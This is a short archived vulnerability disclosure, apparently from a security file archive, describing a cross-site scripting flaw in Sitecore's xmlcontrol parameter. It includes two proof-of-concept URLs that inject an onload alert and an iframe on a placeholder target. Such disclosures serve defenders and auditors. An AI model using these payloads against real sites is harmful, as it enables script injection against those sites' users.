Sitecore XML Cross Site Scripting

Sitecore XML Cross Site Scripting: Posted Jan 29, 2014; Authored by Mark Litchfield; Sitecore's special way of display XML controls allows for a cross site scripting attack.; tags | exploit, xss; SHA-256 | 332c44062becbe780354571679bbca0e59d1468bef6e56ac13e0ebfa8d53931a; Download | Favorite | View

Sitecore XML Cross Site Scripting

Hey All,

Sitecores “special way” of displaying XML Controls directly allows for a 
Cross Site Scripting Attack – more can be achieved with these XML 
Controls and will be documented in another vulnerability report

http://target/?xmlcontrol=body%20onload=alert(123)
http://target/?xmlcontrol=iframe%20src=https://www.google.com/images/srpr/logo11w.png

More information can be found at 
http://www.securatary.com/vulnerabilities - Also listed is a useful text 
file for use with Burp when auditing SiteCore.

Top Authors In Last 30 Days

Red Hat 229 files
Ubuntu 84 files
Gentoo 24 files
Debian 20 files
Google Security Research 17 files
Mirabbas Agalarov 16 files
CraCkEr 12 files
Ivan Fratric 8 files
Ahmet Umit Bayram 7 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,970)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,748)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,312)
HPUX (879)
iOS (342)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,734)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,304)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,605)
UNIX (9,232)
UnixWare (186)
Windows (6,555)
Other

Sitecore XML Cross Site Scripting

Sitecore XML Cross Site Scripting

File Archive:

May 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Sitecore XML Cross Site Scripting

Share This

Sitecore XML Cross Site Scripting

File Archive:

May 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems